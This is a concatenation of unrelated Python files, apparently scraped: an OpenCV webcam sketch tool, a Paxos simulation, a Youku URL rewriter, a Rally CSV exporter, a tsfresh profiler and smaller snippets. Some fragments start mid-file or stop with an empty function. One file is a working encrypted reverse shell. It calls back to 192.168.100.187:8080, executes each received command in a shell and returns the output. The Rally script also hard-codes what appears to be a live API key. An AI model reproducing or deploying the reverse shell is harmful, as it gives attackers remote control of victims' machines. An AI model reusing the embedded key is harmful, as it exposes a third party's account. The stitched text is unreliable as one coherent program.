# cv2.createTrackbar('upper', 'threshold', 0, 255, nothing)
def sketch(image):
    """Return a binary 'sketch' of a BGR image: grayscale -> Gaussian
    blur -> inverted Otsu threshold (the same pipeline capture() applies
    interactively).

    BUG FIX: the original body returned the undefined name `threshold`,
    which raised NameError on any call.
    """
    # Convert image to grayscale
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    blurred = cv2.GaussianBlur(gray, (5, 5), 0)
    _, threshold = cv2.threshold(blurred, 0, 255,
                                 cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)
    return threshold
def capture():
    """Webcam loop: shows the raw frame plus live Canny and threshold
    previews controlled by the trackbars.  Enter (key 13) saves the
    current threshold image to ./MySketch.jpg; Esc (key 27) exits."""
    cap = cv2.VideoCapture(0)
    while True:
        ret, frame = cap.read()
        image=frame
        img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        # Clean up image using Gaussian Blur
        # NOTE(review): img_gray_blur is computed but never used below.
        img_gray_blur = cv2.GaussianBlur(img_gray, (5,5), 0)
        # Poll current trackbar positions each frame.
        lower_c = cv2.getTrackbarPos('lower', 'canny')
        upper_c = cv2.getTrackbarPos('upper', 'canny')
        # lower_t = cv2.getTrackbarPos('value', 'threshold')
        upper_t = cv2.getTrackbarPos('value', 'threshold')
        s_c = cv2.getTrackbarPos(switch_c, 'canny')
        s_t = cv2.getTrackbarPos(switch_t, 'threshold')
        # Canny switch off -> pass the grayscale frame through unchanged.
        if s_c == 0:
            edges = img_gray
        else:
            edges = cv2.Canny(img_gray, lower_c, upper_c)
        # Threshold switch off -> pass the edges image through unchanged.
        if s_t == 0:
            threshold = edges
        else:
            ret,threshold = cv2.threshold(edges,0,upper_t,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
        cv2.imshow('original', image)
        cv2.imshow('canny', edges)
        cv2.imshow('threshold',threshold)
        k = cv2.waitKey(1) & 0xFF
        if k==13:  # Enter: save the current sketch
            cv2.imshow("Final Sketch",threshold)
            print("captured")
            cv2.imwrite("./MySketch.jpg",threshold)
        elif k==27:  # Esc: quit the loop
            print("exit")
            break
    cap.release()
    cv2.destroyAllWindows()
# Run the interactive capture loop immediately (notebook-style script).
capture()
# NOTE(review): everything below is commented-out scratch code from the
# notebook, kept for reference only.
# try:
#     capture()
# #     print()
# except:
#     print("Error")
# finally:
#     cv2.destroyAllWindows()
# if(cap!=null):
#     cap.release()
#     cv2.destroyAllWindows()
# In[4]:
# while True:
#     frame=capture();
#     op=sketch(frame)
#     if(cv2.waitKey(0)==13):
# #         confirm --> Enter
#         cv2.imwrite("MySketch.jpg",op)
#         break;
#     elif(cv2.waitKey(0)==32):
#         cv2.destroyAllWindows()
#         continue;
#     else:
#         break;
# cv2.destroyAllWindows()
# In[ ]:
|
def count_set_bits(m):
    """Return the population count (number of 1-bits) of m; 0 for m <= 0.

    Equivalent to the original shift-and-test loop, factored out so the
    computation can be reused and tested apart from stdin handling.
    """
    return bin(m).count("1") if m > 0 else 0


if __name__ == "__main__":
    # Input: two integers on one line.  n is read but not used by the
    # computation (kept to preserve the expected input format).
    n, m = map(int, input().split())
    print(count_set_bits(m))
|
import subprocess
import os
import time
import recent.markup.markup
from recent.notifier.base import Notifier
class X11Notifier(Notifier):
    """Notifier backend that shows desktop notifications through the X11
    `notify-send` command-line tool."""
    id = 'x11notify'
    deps = ['x11']
    config_keys = ['display']

    def notify(self, item):
        """Render `item` to plain text and hand it to notify-send,
        blocking until the command finishes."""
        # Ensure a DISPLAY is set: prefer the configured one, otherwise
        # fall back to :0 when the environment provides none.
        if self.config['display'].startswith(':'):
            os.putenv('DISPLAY', self.config['display'])
        elif 'DISPLAY' not in os.environ:
            os.putenv('DISPLAY', ':0')
        # Strip the project's log markup from the title (width=0
        # presumably disables wrapping - TODO confirm in markup module).
        lm = recent.markup.markup.LogMarkup()
        lo = recent.markup.markup.LogOutputMarkup(width=0)
        lm.buff = item.title
        lm.parse(lo)
        title = lo.buff
        # Keep notifications short.
        if len(title) > 200:
            title = title[:200]+'…'
        if item.author:
            text = '<b>%s</b>: %s'%(item.author, title)
        else:
            text = title
        # NOTE(review): encoding to bytes before Popen is Python-2-era
        # behaviour; under Python 3 notify-send would get a bytes arg.
        text = text.encode('utf-8')
        p = subprocess.Popen(['notify-send',item.provider,text])
        p.wait()
|
import unittest
def unique_0(s):
    """Return True iff no character occurs more than once in s,
    tracking already-seen characters in a set (single pass)."""
    seen = set()
    for ch in s:
        if ch in seen:
            return False
        seen.add(ch)
    return True
def unique_1(s):
    """Return True iff all characters of s are distinct.

    Deduplicating s into a set preserves its length exactly when there
    are no repeated characters.
    """
    return len(set(s)) == len(s)
class Test(unittest.TestCase):
    """Runs one shared truth table against every unique_* implementation."""
    def test_unique(self):
        # (input, expected) pairs shared by all implementations.
        data = [
            ('', True),
            ('abc', True),
            ('aaa', False),
            ('abcbad', False),
        ]
        # Discover every module-level name starting with 'unique_' so
        # new implementations are picked up automatically.
        for k, v in globals().items():
            if k.startswith('unique_'):
                for s, r in data:
                    self.assertEqual(v(s), r)


if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
'''
This program is used to simulate the basic Paxos algorithm.
The Proposer is also the Learner who finally learns which proposal is chosen. The Acceptor receives proposal and make desision.
We simulate the case that network is broken so the message can not reach to a target. But we do not simulate the absence of participators.
The global unique proposal_id is generated with the equation : proposal_id = N*max_proposer_num + proposer_ID
To make it simple, please reference the figures in http://www.jianshu.com/p/d9d067a8a086
'''
from Queue import Empty
from Queue import Queue
import random
import threading
import time
# Serialises console output and the live-thread counters across threads.
mutex = threading.Lock()
# Candidate values a proposer may try to get chosen.
gvalues = [ "[Operation A]",
            "[Operation B]",
            "[Operation C]",
            "[Operation D]",
            "[Operation E]",
            "[Operation F]"]
live_proposer_num = 0  # number of proposer threads still running
live_acceptor_num = 0  # number of acceptor threads still listening
acceptors_num = 3
proposers_num = 3
max_proposer_num = 20 # It is used to generate unique sequence ID for each proposer
acceptor_can_ignore = False # Used to simulate whether an acceptor sends response to proposer when rejecting proposal
debug_level = 1  # printStr() only emits messages whose level <= debug_level
def printStr(string, level=0):
    """Emit a "timestamp::message" line when `level` does not exceed the
    global debug_level; the global mutex keeps thread output unscrambled."""
    if level > debug_level:
        return
    with mutex:
        print("%s::%s" % (time.time(), string))
# Counting how many proposer is proposing
def proposer_live(inc):
    """Atomically increment (inc=True) or decrement (inc=False) the
    global count of proposer threads that are still proposing."""
    global live_proposer_num
    with mutex:
        live_proposer_num += 1 if inc else -1
# Counting how many acceptor is listening
def acceptor_live(inc):
    """Atomically increment (inc=True) or decrement (inc=False) the
    global count of acceptor threads that are still listening."""
    global live_acceptor_num
    with mutex:
        live_acceptor_num += 1 if inc else -1
class Proposer(threading.Thread):
    """Proposer thread (doubling as the Learner): repeatedly runs the
    two-phase Paxos protocol - a "prepare" round then an "accept" round -
    until a majority of acceptors agree on its proposal, then prints the
    learned value and exits."""
    def __init__(self, t_name,              # Name of the thread
                 queue_from_acceptor,       # Queue to get message from acceptors
                 queue_to_acceptors,        # Queues to send message to acceptors
                 id,                        # The ID of current proposer
                 m_acceptor_num):           # Total number of acceptors
        super(Proposer, self).__init__()
        self.queue_recv = queue_from_acceptor
        self.queue_send_list = queue_to_acceptors
        self.m_acceptor_num = m_acceptor_num
        self.live_acceptor_num = 0  # Number of acceptors this thread talks to
        self.max_proposal_id = 0    # The max proposal ID returned from acceptors
        self.name = t_name
        self.id = id
        self.reject = 0
        self.accept = 0
        self.status = None  # current stage: "prepare" or "accept"
        self.N = 0          # Used to generate global unique proposal ID
        self.value = None
        proposer_live(True)

    def run(self):
        # raise a proposal
        self.status = "prepare"
        self.value = gvalues[random.randrange(0, 6)]  # It can be None until sending accept to acceptors
        while True:
            # In "prepare" stage, send proposal to acceptors
            self.sendPropose()
            # Receive response from all acceptors
            while True:
                try:
                    var = self.queue_recv.get(True, 4)
                    self.processMsg(var)
                    if (self.reject + self.accept) == self.live_acceptor_num:
                        printStr("Stage %s; %s get response from all acceptors." % (self.status, self.name), 2)
                        break
                except Empty:
                    # At least one acceptor does not send response to the proposer
                    printStr("Stage %s; %s get timeout when waiting response from acceptors" % (self.status, self.name), 2)
                    break
            # Summarize all response from acceptors
            # If not majority agree on the proposal, increase proposal ID and raise proposal again
            if not self.summarize():
                continue
            # In "accept" stage, send proposal to acceptors
            self.sendPropose()
            # Receive response from all acceptors
            while True:
                try:
                    var = self.queue_recv.get(True, 1)
                    self.processMsg(var)
                    if (self.reject + self.accept) == self.live_acceptor_num:
                        printStr("Stage %s; %s get response from all acceptors." % (self.status, self.name), 2)
                        break
                except Empty:
                    # At least one acceptor does not send response to the proposer
                    printStr("Stage %s; %s get timeout when waiting response from acceptors" % (self.status, self.name), 2)
                    break
            # Summarize all response from acceptors
            # If not majority agree on the proposal, increase proposal ID and raise proposal again
            if not self.summarize():
                continue
            # If majority agree on the proposal, print the learned "value" and exit
            printStr("\033[1;32m#### %s get final agreement from majority. Agree on proposal : %s. Thread exit.\033[0m" % (self.name, self.value), 0)
            proposer_live(False)
            break

    def processMsg(self, var):
        """Tally one acceptor response for the current stage."""
        if self.status == "prepare" and var["type"] == "prepare":
            if var["result"] == "reject":
                self.reject += 1
            elif var["result"] == "accept":
                self.accept += 1
                # In prepare stage, multiple acceptors respond to the proposer, chose the response with valid "value" and max proposal_id
                # and use the associated value as its own value and go to the accept stage
                # else the proposer uses its own original value
                if var.get("value", None) and var.get("proposal_id", None) and var["proposal_id"] > self.max_proposal_id:
                    # remember the max proposal_id
                    self.max_proposal_id = var["proposal_id"]
                    self.value = var["value"]
        elif self.status == "accept" and var["type"] == "accept":
            if var["result"] == "reject":
                self.reject += 1
            elif var["result"] == "accept":
                self.accept += 1

    def sendPropose(self):
        """Broadcast the current-stage proposal to a random ~90% subset
        of acceptors (simulating lossy network delivery)."""
        self.reject = 0
        self.accept = 0
        time.sleep(1/random.randrange(1, 20))
        body = {
            "type": self.status,
            # proposal_id = N*max_proposer_num + proposer_ID keeps IDs
            # globally unique across proposers.
            "proposal_id": (self.N * max_proposer_num + self.id),
            "value": self.value,
            "proposer": self.id
        }
        # Send message to acceptors, simulating network broken with 10% ratio
        selected_acceptor = []
        selected_id = []
        i = 0
        for acceptor in self.queue_send_list:
            if random.randrange(100) < 90:
                selected_acceptor.append(acceptor)
                selected_id.append(i)
            i += 1
        self.live_acceptor_num = len(selected_acceptor)
        printStr("Stage %s; %s propose with proposal ID = %d, value = %s. Message reaches Acceptor %s" % (self.status, self.name, body["proposal_id"], self.value, str(selected_id)), 1)
        for acceptor in selected_acceptor:
            acceptor.put(body)
        time.sleep(1/random.randrange(1, 10))

    def summarize(self):
        """Return True when a majority accepted this round; advance the
        stage on success, otherwise bump N and restart from "prepare"."""
        getAgree = True
        printStr("Stage %s; %s proposes %s summary : %d accept and %d reject" % (self.status, self.name, self.value, self.accept, self.reject), 1)
        if self.accept > self.m_acceptor_num / 2:
            # If get majority accept, go to next stage
            if self.status == "prepare":
                self.status = "accept"
            else:
                self.status = "prepare"
        else:
            # else increase proposal ID and raise proposal again
            self.N += 1
            getAgree = False
            self.status = "prepare"
        return getAgree
class Acceptor(threading.Thread):
    """Acceptor thread: answers prepare/accept requests according to the
    Paxos promise rules, and exits once no proposer remains live."""
    def __init__(self, t_name, queue_from_proposer, queue_to_proposers, id):
        super(Acceptor, self).__init__()
        self.name = t_name
        self.queue_recv = queue_from_proposer
        self.queue_to_proposers = queue_to_proposers
        self.id = id
        self.max_responded_proposal_id = None  # It is the max proposal ID which it responds to proposer in "prepare" stage
        self.max_accepted_proposal_id = None   # It is the max proposal ID which it accepts in "accept" stage
        self.value = None
        acceptor_live(True)

    def run(self):
        while True:
            try:
                var = self.queue_recv.get(True, 1)
                ignore, resp = self.processPropose(var)
                if ignore and acceptor_can_ignore:
                    continue
                # Simulating the network failure with 10% ratio
                if random.randrange(100) < 90:
                    self.queue_to_proposers[var["proposer"]].put(resp)
                    printStr("Stage %s; %s responds to Proposer%d with %s" % (var["type"], self.name, var["proposer"], str(resp)), 2)
                    # printStr("Stage %s; %s responds to Proposer%d with proposal_id = %d, result = %s, value = %s" % (var["type"], self.name, var["proposer"], vars.get("proposal_id", -1), vars["result"], vars.get("value", None)), 2)
                else:
                    printStr("Stage %s; %s fails to respond to Proposer%d." % (var["type"], self.name, var["proposer"]), 2)
                    pass
            except Empty:
                pass
                # No traffic for a second: exit once every proposer has
                # learned a value and terminated.
                if live_proposer_num == 0:
                    acceptor_live(False)
                    break
                continue

    def processPropose(self, var):
        """Apply the Paxos acceptor rules to one request; return a pair
        (ignore, response) where `ignore` marks a rejection that may be
        silently dropped when acceptor_can_ignore is set."""
        ignore = False
        res = {"type":var["type"], "acceptor":self.id}
        if var["type"] == "prepare":
            if not self.max_responded_proposal_id:
                # If it never seen a proposal, promise never accept a proposal with proposal ID less than var["proposal_id"] in future
                self.max_responded_proposal_id = var["proposal_id"]
                res["result"] = "accept"
                res["proposal_id"] = var["proposal_id"]  # return the proposal ID as the max ID that the accepter has ever seen
            elif self.max_responded_proposal_id > var["proposal_id"]:
                # If ever seen a proposal with higher proposal ID, ignore the message or respond with "reject"
                # Responding the message can optimize performance to avoid network timeout in proposer side
                res["result"] = "reject"
                ignore = True
            elif self.max_responded_proposal_id == var["proposal_id"]:
                # Should never go into this case
                res["result"] = "reject"
                ignore = True
            else:  # self.max_accepted_proposal_id && var["proposal_id"] > self.max_responded_proposal_id
                # If it receives a proposal with a higher proposal ID than what it has ever seen, accept the proposal
                # and respond with the max proposal ID and its associated value (if there is a value)
                res["result"] = "accept"
                res["proposal_id"] = self.max_accepted_proposal_id  # return the max ID it has ever accepted (It can be None)
                res["value"] = self.value  # return the value associated with the max ID (It can be None)
                self.max_responded_proposal_id = var["proposal_id"]  # promise it will never accept a proposal ID less than var["proposal_id"] in future
        elif var["type"] == "accept":
            if self.max_responded_proposal_id > var["proposal_id"]:
                # If has ever seen a proposal with higher proposal ID, ignore the message or respond with "reject"
                # Responding the message can optimize performance to avoid network timeout in proposer side
                res["result"] = "reject"
                ignore = True
            else:
                # If it receives a proposal with a higher proposal ID that what it has ever seen, accept the proposal.
                # The message should be sent to a logical learner. Because there is no learner here, so respond to proposer
                res["result"] = "accept"
                self.max_accepted_proposal_id = var["proposal_id"]
                self.value = var["value"]
        return ignore, res
if __name__ == '__main__':
    # Wire up one inbound queue per acceptor and per proposer, start all
    # threads as daemons, then wait until every acceptor has exited.
    q_to_acceptors = []
    q_to_proposers = []
    proposers = []
    acceptors = []
    # NOTE(review): the "leader" queues below are created but never used.
    q_leader_to_proposers = []
    q_to_leader = Queue()
    for i in range(0, acceptors_num):
        q_to_acceptors.append(Queue())
    for i in range(0, proposers_num):
        q_to_proposers.append(Queue())
        q_leader_to_proposers.append(Queue())
    for i in range(0, proposers_num):
        proposers.append(Proposer("Proposer%d" % i,
                                  q_to_proposers[i],
                                  q_to_acceptors,
                                  i,
                                  acceptors_num))
    for i in range(0, acceptors_num):
        acceptors.append(Acceptor("Acceptor%d" % i,
                                  q_to_acceptors[i],
                                  q_to_proposers,
                                  i))
    for i in range(0, acceptors_num):
        acceptors[i].setDaemon(True)
        acceptors[i].start()
    for i in range(0, proposers_num):
        proposers[i].setDaemon(True)
        proposers[i].start()
    # Poll until the last acceptor notices all proposers are done.
    while True:
        time.sleep(1)
        if live_acceptor_num == 0:
            break
|
import re
# Example Youku CDN URL used to exercise the patterns below.
textstr = "http://220.181.154.15/youku/777/6973A2989B932823EEF40247DA/0300020100563ABD71FD2B0230E416F0CBC1F3-EE10-EB22-744F-6010E6849F8C.flv?nk=314613209945_24111796410&ns=2880720_2720180&special=true"
#textstr = "http://220.181.154.15/youku/777/6973A2989B932823EEF40247DA/0300020100563ABD71FD2B0230E416F0CBC1F3-EE10-EB22-744F-6010E6849F8C.flv"
#textstr = 'http://127.0.0.1:80/302_mark/p.l.ykimg.com/ykp2pdata?json=%7B%22ac%22:%22110000%22,%22sid%22:%22644772697605310bff2aa%22,%22time%22:1447727005274,%22vid%22:%22347094008%22,%22ct%22:%2291%22,%22data%22:%7B%22index%22:0,%22addErrorData%22:%7B%22useTime%22:30520,%22metaUrl%22:%22http://106.38.249.75/youku/6572D8744C6407B19EF2B2AB3/0300080100564A782EF2760230E416C173656D-E6E7-175B-B61C-E406C4964545.mp4%22,%22processType%22:%22meta%22%7D%7D,%22errorType%22:%22datamgr_metadata_timeout_error%22,%22logType%22:%22fatal%22,%22vt%22:%22mp4%22,%22vs%22:%2210-14-10-56%22,%22acc%22:3,%22cfg%22:%22player_yk_601%22%7D'
#pattern = re.compile(r"(\w+://)?([^/]+)(/youku/)(.+/)*([^\?]+)(\?([^&=]+=[^&]+)((&[^=]+=[^&]+)*))?")
# Groups: 1 scheme, 2 host, 3 literal "/youku/", 4 intermediate path
# components, 5 file name ending in .mp4/.flv, 7-9 the query-string parts.
pattern = re.compile(r"(\w+://)?([^/]+)(/youku/)(.+/)*([^.?/]+\.(mp4|flv)(?=\?|$))(\?([^&=]+=[^&]+)((&[^=]+=[^&]+)*))?")
# NOTE(review): the bare string literal on the next line is a no-op
# leftover (probably an aborted edit) and can be deleted.
"("
match = pattern.match(textstr)
if match:
    # Dump all capture groups, then two rewritten forms of the URL.
    for i,x in enumerate(match.groups(),1):
        print i,x
    print match.expand(r'\1*\3*/\5')
    print match.expand(r'\1\2\3\4\5')
    #print match.expand(r'\7')
    #print match.expand(r'\8')
    a = match.expand(r'\4')
    tmppattern = re.compile(r"[^/]+/")
    print tmppattern.sub("*/",a)
# Prefix inserted to redirect a URL through the local cache proxy.
CacheIp = r'127.0.0.1:80/302_mark/'
# Masks one path component; applied repeatedly via sub() in UrlTrans.
pattern_star = re.compile(r"[^/]+/")
pattern_youku = re.compile(r"(\w+://)?([^/]+)(/youku/)(.+/)*([^.?/]+\.(mp4|flv)(?=\?))(\?([^&=]+=[^&]+)((&[^=]+=[^&]+)*))?")
# Query parameters stripped when building the cache URL.
filter_set_youku = {'nk','ns','start'}
def UrlTrans(url):
    """Translate a Youku CDN URL into the pair (url_MIE, url_cache).

    url_MIE   - pattern form of the URL with the host replaced by '*'
                and every intermediate path component masked as '*/'.
    url_cache - the URL rewritten to pass through CacheIp, with query
                parameters listed in filter_set_youku removed.
    Returns (url, url) unchanged when the URL does not match
    pattern_youku.
    """
    url_MIE=''
    url_cache=''
    match=pattern_youku.match(url)
    if match:
        # Group 4 holds the intermediate path; mask each component.
        url_MIE=match.expand(r'\1*\3'+pattern_star.sub(r'*/',match.expand(r'\4'))+r'\5')
        url_cache=match.expand(r'\g<1>'+CacheIp+r'\2\3\4\5')
        # Collect the individual key=value pieces of the query string
        # (group 8 is the first pair, group 9 the '&'-joined remainder).
        tmp = list()
        if match.group(7):
            tmp.append(match.group(8))
        if match.group(9):
            tmp.extend(match.group(9)[1:].split('&'))
        tmpstr=''
        for i in tmp:
            if i.split('=')[0] not in filter_set_youku:
                tmpstr+=i
        # NOTE(review): surviving parameters are concatenated without '&'
        # separators here - looks like a bug if more than one parameter
        # survives the filter; confirm intended behaviour with callers.
        if tmpstr:
            url_cache+='?'
            url_cache+=tmpstr
        return url_MIE,url_cache
    return url,url
# Demo: run the translator on the sample URL above.
print '-----------------------------------------------------'
print UrlTrans(textstr)
# Second experiment: prepend the cache prefix to an arbitrary URL,
# preserving the scheme when present.
text = "127.0.0.1/baidu.com"
pattern_default = re.compile(r"(\w+://)?(.+)")
match = pattern_default.match(text)
if match.group(1):
    url_cache=match.group(1)
else:
    url_cache=""
url_cache+=CacheIp
url_cache+=match.group(2)
print url_cache
# NOTE(review): the long iTunes URL below is a bare string literal - a
# no-op leftover kept only as sample data; it can be deleted.
"http://iosapps.itunes.apple.com/apple-assets-us-std-000001/Purple69/v4/f6/3a/39/f63a39ad-76ae-77d4-9d2d-a21664cefc89/pre-thinned6390962509010654325.thinned.signed.dpkg.ipa?accessKey=1447331811_8321268509499498333_ngbz9y0%2FANW9WMZOrCcr4%2BRD4tzEwCLWyiQBtTOt%2FdmTjo1Sv4HRW%2BaTCJjSe3Z6T7V4FV%2BqIL5qgbOKDUxbWGcL2v5Fu1w3kU3KcuYcKtLFKIrO1dj43A65z%2BHKBVQ5nPO6ly0JAQAswWhsKOIIMABhZO5%2FpQMvS%2Bel%2FhZdYdSJaddPBYnudLeYYG0OnF6sKol2cLJU6sCMdoF%2BSGEICby75t9fNg7i6caPaPISuWs%3D"
|
# Given a string, find the first non-repeating character in it and return
# it's index. If it doesn't exist, return -1.
#
# Examples:
#
# s = "leetcode"
# return 0.
#
# s = "loveleetcode",
# return 2.
# Note: You may assume the string contain only lowercase letters.
def first_unique_char(s):
    """Return the index of the first character of s that occurs exactly
    once, or -1 if there is none.

    Two O(n) passes: count every character, then scan for the first one
    with count 1.  (The original tracked a `unique` list and used
    `c in unique` / `unique.remove(c)` inside the loop, which is
    accidentally O(n**2) in the worst case.)
    """
    counts = {}
    for c in s:
        counts[c] = counts.get(c, 0) + 1
    for i, c in enumerate(s):
        if counts[c] == 1:
            return i
    return -1


assert first_unique_char("leetcode") == 0
assert first_unique_char("loveleetcode") == 2
assert first_unique_char("cc") == -1
|
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
import socket
import subprocess
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
def decryptAESKey(encrypted_aes_key, client_RSA_private_key):
    """Decrypt data received from the peer (used for both the AES key
    and the CTR counter) with our RSA private key (PEM-encoded).

    NOTE(review): PyCrypto's raw RSA decrypt() is textbook RSA with no
    OAEP padding - insecure and long deprecated; PKCS1_OAEP should be
    used instead.
    """
    decryptor = RSA.importKey(client_RSA_private_key)
    aes_key = decryptor.decrypt(encrypted_aes_key)
    return aes_key
def encrypt(message, aes_key, counter):
    """AES-CTR encrypt `message` with the shared session key.

    NOTE(review): the lambda returns the *same* counter block for every
    AES block, so the keystream repeats - this nullifies CTR security.
    A proper Crypto.Util.Counter should be used.
    """
    encrypto = AES.new(aes_key, AES.MODE_CTR, counter=lambda: counter)
    return encrypto.encrypt(message)
def decrypt(message, aes_key, counter):
    """AES-CTR decrypt `message`; mirror of encrypt() and shares its
    fixed-counter weakness (see NOTE there)."""
    decrypto = AES.new(aes_key, AES.MODE_CTR, counter=lambda: counter)
    return decrypto.decrypt(message)
def connect():
    """Reverse-connect to the handler at 192.168.100.187:8080, perform an
    RSA handshake to receive an AES session key and counter, then loop:
    receive an encrypted command, execute it in a shell, and send back
    the encrypted stdout and stderr.  Exits when 'terminate' is received.
    """
    # do client RSA key stuff
    new_key = RSA.generate(4096 ) # generate RSA key that 4096 bits long
    # export the keys in PEM format, the PEM extension contains ASCII encoding
    client_RSA_public_key = new_key.publickey().exportKey("PEM")
    client_RSA_private_key = new_key.exportKey("PEM")
    print 'created RSA keys'
    print client_RSA_public_key
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # to prevent "socket.error: [Errno 98] Address already in use" (socket is in a TIME_WAIT state)
    # we set a flag to prevent this
    # SO_REUSEADDR flag tells the kernel to reuse a local socket in TIME_WAIT state, without waiting for its natural timeout to expire
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.connect(('192.168.100.187', 8080))
    # send client RSA public key to server - server will create AES key and send it encrypted (with client public key) back to client
    s.send(client_RSA_public_key)
    # do AES encryption stuff
    # receive encrypted AES key -> decrypt with RSA private key
    recv_encrypted_aes_key = s.recv(1024)
    aes_key = decryptAESKey(recv_encrypted_aes_key, client_RSA_private_key)
    # receive encrypted AES counter -> decrypt with RSA private key
    recv_encrypted_aes_counter = s.recv(1024)
    aes_counter = decryptAESKey(recv_encrypted_aes_counter, client_RSA_private_key)
    while True:
        # One command per iteration; everything on the wire is AES-CTR encrypted.
        command = decrypt(s.recv(1024), aes_key, aes_counter)
        print ' We received: ' + command
        if 'terminate' in command:
            s.close()
            break
        else:
            # NOTE(review): shell=True executes the raw received string as a
            # shell command — this is the intended remote-execution behavior.
            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send(encrypt(CMD.stdout.read(), aes_key, aes_counter))
            s.send(encrypt(CMD.stderr.read(), aes_key, aes_counter))
def main ():
    """Entry point: run the reverse-connection client loop."""
    connect()
# Runs immediately on import/execution — no __main__ guard in the original.
main()
|
from pyral import Rally, rallySettings, rallyWorkset
import sys
import csv
"""
"""
gAttribs = [
"FormattedID", #"Name",
"ScheduleState",
"Project.Name",
"Project.Parent.Name",
"PlanEstimate",
"Iteration.Name",
"PortfolioItem.FormattedID", #"PortfolioItem.Name",
"PortfolioItem.Parent.FormattedID", #"PortfolioItem.Parent.Name",
]
def get_deep_attr(obj, attrs):
    """Walk a dotted attribute path (e.g. "Project.Name") on *obj*.

    :param obj: object to start from.
    :param attrs: dot-separated attribute names.
    :return: the value at the end of the path, or "" as soon as any
        segment of the path is missing.
    """
    current = obj
    for segment in attrs.split("."):
        try:
            current = getattr(current, segment)
        except AttributeError:
            return ""
    return current
def has_deep_attr(obj, attrs):
    """Return True iff the full dotted attribute path exists on *obj*.

    Bug fix: the previous implementation called get_deep_attr() inside a
    try/except AttributeError — but get_deep_attr() already catches
    AttributeError internally and returns "", so this function always
    returned True.  Walk the path directly instead, using a sentinel so
    that "" (a legitimate attribute value) is not mistaken for "missing".
    """
    _missing = object()
    current = obj
    for segment in attrs.split("."):
        current = getattr(current, segment, _missing)
        if current is _missing:
            return False
    return True
# Shorthand: write a message to stderr (no trailing newline is added).
errout = sys.stderr.write
def main(args):
    """Log in to Rally, run a fixed iteration query, and dump the
    attributes listed in gAttribs for each returned story to out.csv.

    :param args: command-line arguments; '-'-prefixed entries are treated
        as options and stripped, the rest are (nominally) work-item IDs.
    """
    options = [opt for opt in args if opt.startswith('-')]
    args = [arg for arg in args if arg not in options]
    #if len(args) != 1:
    #    errout('ERROR: Wrong number of arguments\n')
    #    sys.exit(3)
    #args = ["US504765"] # no TF
    #args = ["US487422"] #for Titans
    server = 'rally1.rallydev.com'
    # NOTE(review): hard-coded API credential checked into source — should
    # be moved to an environment variable or config file and rotated.
    apikey = '_LhzUHJ1GQJQWkEYepqIJV9NO96FkErDpQvmHG4WQ'
    workspace = 'Sabre Production Workspace'
    # Second assignment deliberately overrides the first project choice.
    project = 'Sabre'
    project = 'LGS Titans (BLR)'
    print ('Logging in...')
    rally = Rally(server, apikey=apikey, workspace=workspace, project=project)
    print ('Query execution...')
    for arg in args:
        # Infer entity type from the ID prefix (DE.../US.../F...).
        if arg[0] == "D":
            entityName = 'Defect'
        elif arg[0] == "U":
            entityName = 'HierarchicalRequirement'
        else:
            entityName = 'PortfolioItem'
        #queryString = 'FormattedID = "%s"' % arg
        # NOTE(review): both the query string and entityName are overridden
        # below, so the per-arg prefix logic above is currently dead code.
        queryString = '(Iteration.StartDate > "2017-12-31")'
        entityName = 'HierarchicalRequirement'
        print ("Query = ", queryString)
        response = rally.get(entityName, fetch=True, projectScopeDown=True, query=queryString)
        if response.resultCount == 0:
            errout('No item found for %s %s\n' % (entityName, arg))
        else:
            # NOTE(review): out.csv is rewritten for every arg — only the
            # last argument's results survive. Confirm this is intended.
            fileName = 'out.csv'
            with open (fileName, 'w', newline='') as csvfile:
                outfile = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
                # Header row: the attribute paths themselves.
                outrow = [field for field in gAttribs]
                outfile.writerow(outrow)
                for item in response:
                    outfile.writerow( [get_deep_attr(item, param) for param in gAttribs])
if __name__ == '__main__':
    main(sys.argv[1:])
|
# -*- coding: utf-8 -*-
# This file as well as the whole tsfresh package are licenced under the MIT licence (see the LICENCE.txt)
# Maximilian Christ (maximilianchrist.com), Blue Yonder Gmbh, 2016
"""
Contains methods to start and stop the profiler that checks the runtime of the different feature calculators
"""
import cProfile
import io
import logging
import pstats
from tsfresh import defaults
# Module-level logger, used by end_profiling() below.
_logger = logging.getLogger(__name__)
# todo: tackle a debate about the need for this profiler
# todo: we need unit tests for the profiling routine
def start_profiling():
    """
    Helper function to start the profiling process and return the profiler (to close it later).
    :return: a started profiler.
    :rtype: cProfile.Profile
    Start and stop the profiler with:
    >>> profiler = start_profiling()
    >>> # Do something you want to profile
    >>> end_profiling(profiler, "out.txt", "cumulative")
    """
    profiler = cProfile.Profile()
    profiler.enable()
    return profiler
def end_profiling(profiler, filename, sorting=None):
    """
    Helper function to stop the profiling process and write out the profiled
    data into the given filename. Before this, sort the stats by the passed sorting.

    :param profiler: An already started profiler (probably by start_profiling).
    :type profiler: cProfile.Profile
    :param filename: The name of the output file to save the profile.
    :type filename: basestring
    :param sorting: The sorting of the statistics passed to the sort_stats
        function. If None, the stats are written unsorted.
    :type sorting: basestring
    :return: None
    :rtype: None

    Start and stop the profiler with:
    >>> profiler = start_profiling()
    >>> # Do something you want to profile
    >>> end_profiling(profiler, "out.txt", "cumulative")
    """
    profiler.disable()
    s = io.StringIO()
    stats = pstats.Stats(profiler, stream=s)
    # Bug fix: pstats raises a KeyError for sort_stats(None), so the old
    # default sorting=None crashed.  Only sort when a key was supplied.
    if sorting is not None:
        stats = stats.sort_stats(sorting)
    stats.print_stats()
    with open(filename, "w+") as f:
        _logger.info(
            "[calculate_ts_features] Finished profiling of time series feature extraction"
        )
        f.write(s.getvalue())
def get_n_jobs():
    """
    Get the number of jobs to use for parallel processing.
    :return: The number of jobs to use for parallel processing.
    :rtype: int
    """
